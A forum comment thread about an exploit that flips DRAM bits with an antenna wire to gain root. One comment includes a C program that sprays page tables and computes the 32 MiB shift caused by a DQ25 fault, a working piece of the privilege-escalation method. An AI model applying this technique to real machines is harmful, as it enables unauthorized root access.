Exploiting DRAM bitflips to get a root shell (bsky.app)
104 points by goranmoomin 4 months ago | hide | past | favorite | 13 comments



<rant value="verbose">

It's circuit bending, or Fritzing, not finding a clever exploit in DRAM. Even an ECC module isn't going to help you if it's on the CPU data bus.

I just hope we don't all end up suffering through yet another 50% slowdown in patches to the Kernel to avoid this nonsense because someone buys the BS and now it has to be "fixed", like the row hammer software fixes, instead of just fixing the damn DRAM modules, and better hardware.

</rant>

Another analogy:

It's like when a brain surgeon probes your cerebellum and suddenly you smell strawberry or hear Brahms. The surgeon certainly doesn't know what reaction you have unless you tell them.

You wouldn't go around later saying "Dr Jones made me smell strawberries, on a whim, certainly he's a G*d"


If there is no unpredictable ASLR then in this case it is as if the surgeon knows exactly where to probe to make you smell strawberries.


Your analogy isn't quite right. It's as if the doctor is capable of turning your entire brain into strawberry-sensing neurons, and then they poke it and 90% of the time you think about strawberries.


Some context from the author’s fedi account:

> I'm exploring this because I think it might be useful for console hacking - where you have physical access, and the ability to execute sandboxed code (say, inside a web browser)

ID: @retr0id@retr0.id (they ask not to link to their fedi instance).


This is some low level hacking right here


Do I need a lighter or the Matrix soundtrack to accomplish this hack?



So if we don't have the addition of the antenna wire, is the usual-case shielding sufficient, or do we just need larger/more intense pulses, more of them, or somewhere in between? I'd like to try this at home, but not if I have to solder a wire on the already small RAM traces.


If you try it on a desktop system, the RAM is likely going to be in through-hole DIMM slots, so the soldering will be a lot more manageable than in a laptop.


I’m not sure how you would limit the incoming interference to a single bit, unless you’re very good at beam forming antennas.


Yet again, I wish we all had ECC ram!

Here's the code: https://github.com/DavidBuchanan314/dram_emfi/blob/main/linu... -- the basic idea is

> Hardware setup: This time I put the "antenna" wire on DQ25, which will fault 64-bit values to +/-32MiB

> Exploit strat: We fill up as much of physical memory as possible with page tables.

> When we fault a PTE read, we have a good chance of landing on a page table, giving us R/W access to a page table from userspace.
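The two quoted steps translate into a small amount of arithmetic and one memory trick, shown here as an added example (this is not the author's dram_emfi code; it is a model of what the quoted strategy implies). Assumed: 4 KiB pages, 8-byte PTEs whose physical-frame field covers bit 25, and a Linux/x86-64 host with `mmap`. The spray uses the shared zero page (a read fault on private anonymous memory costs a PTE page but no data page); whether the author's loader does exactly that is not stated on the page, so treat the spray function as one way to do it, not as the repo's method. The sample PTE value is constructed.

```c
/* Added example, not the author's dram_emfi code.
 * Assumptions: 4 KiB pages, 64-bit PTEs with the frame address covering bit 25,
 * Linux/x86-64 mmap semantics. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20      /* Linux value; fallback for strict-ANSI builds */
#endif
#ifndef MAP_NORESERVE
#define MAP_NORESERVE 0x4000    /* Linux value */
#endif

#define PAGE_SIZE   4096ULL
#define PTES_PER_PT 512ULL                      /* 4 KiB page table / 8-byte PTE */
#define PT_SPAN     (PTES_PER_PT * PAGE_SIZE)   /* one PTE page maps 2 MiB of VA */
#define DQ_BIT      25
#define DQ_DELTA    (1ULL << DQ_BIT)            /* 2^25 = 32 MiB */

/* A pulse coupled into DQ25 flips bit 25 of whatever 64-bit word is crossing
 * the bus. In a PTE that bit is part of the physical frame address, so the
 * mapping silently moves by +32 MiB (bit was 0) or -32 MiB (bit was 1). */
uint64_t glitch_dq25(uint64_t pte) { return pte ^ DQ_DELTA; }

int64_t glitch_delta(uint64_t pte)
{
    return (pte & DQ_DELTA) ? -(int64_t)DQ_DELTA : (int64_t)DQ_DELTA;
}

/* Spray: map `bytes` of anonymous memory and *read* one byte per 2 MiB.
 * A read fault on private anonymous memory maps the shared zero page, so the
 * kernel allocates one PTE page per 2 MiB slot and no data pages: 4 KiB of
 * page tables per 2 MiB of address space. Transparent huge pages are turned
 * off for the region; otherwise a read fault may map the huge zero page at
 * PMD level and no PTE page is created at all. Returns the number of 2 MiB
 * slots (PTE pages) touched, 0 on failure. */
size_t spray_page_tables(size_t bytes, void **region_out)
{
    unsigned char *p = mmap(NULL, bytes, PROT_READ,
                            MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
    if (p == MAP_FAILED)
        return 0;
#ifdef MADV_NOHUGEPAGE
    madvise(p, bytes, MADV_NOHUGEPAGE);
#endif
    size_t slots = 0;
    for (size_t off = 0; off + PAGE_SIZE <= bytes; off += PT_SPAN) {
        volatile unsigned char sink = p[off];   /* read fault only, never write */
        (void)sink;
        slots++;
    }
    if (region_out) *region_out = p;
    else munmap(p, bytes);
    return slots;
}

/* Linux-only observation hook: VmPTE from /proc/self/status in KiB, or -1. */
long vm_pte_kib(void)
{
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return -1;
    char line[256];
    long kib = -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "VmPTE:", 6) == 0) { kib = strtol(line + 6, NULL, 10); break; }
    }
    fclose(f);
    return kib;
}

int main(void)
{
    /* Constructed PTE: frame 0x80000000 with present/writable/user/accessed/dirty flags. */
    uint64_t pte = 0x0000000080000067ULL;
    printf("PTE %#018llx -> glitched %#018llx (delta %+lld bytes)\n",
           (unsigned long long)pte, (unsigned long long)glitch_dq25(pte),
           (long long)glitch_delta(pte));

    long before = vm_pte_kib();
    void *region = NULL;
    size_t slots = spray_page_tables(1ULL << 30, &region);   /* 1 GiB of VA */
    long after = vm_pte_kib();
    printf("touched %zu slots; VmPTE %ld KiB -> %ld KiB\n", slots, before, after);
    if (region) munmap(region, 1ULL << 30);
    return 0;
}
```

Run it and compare VmPTE before and after: the spray should add roughly 4 KiB of page tables per 2 MiB slot while RSS barely moves, which is the property the quoted strategy relies on. The ratio also shows why a 32 MiB displacement is attractive: with most of physical memory converted into page tables, a PTE that lands 32 MiB away has a high chance of pointing at another page table rather than at ordinary data.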


I remember kids using these things into Street Fighter II machines to get free credits.


Impressive! And a music track like that should be standard for all progress bars.



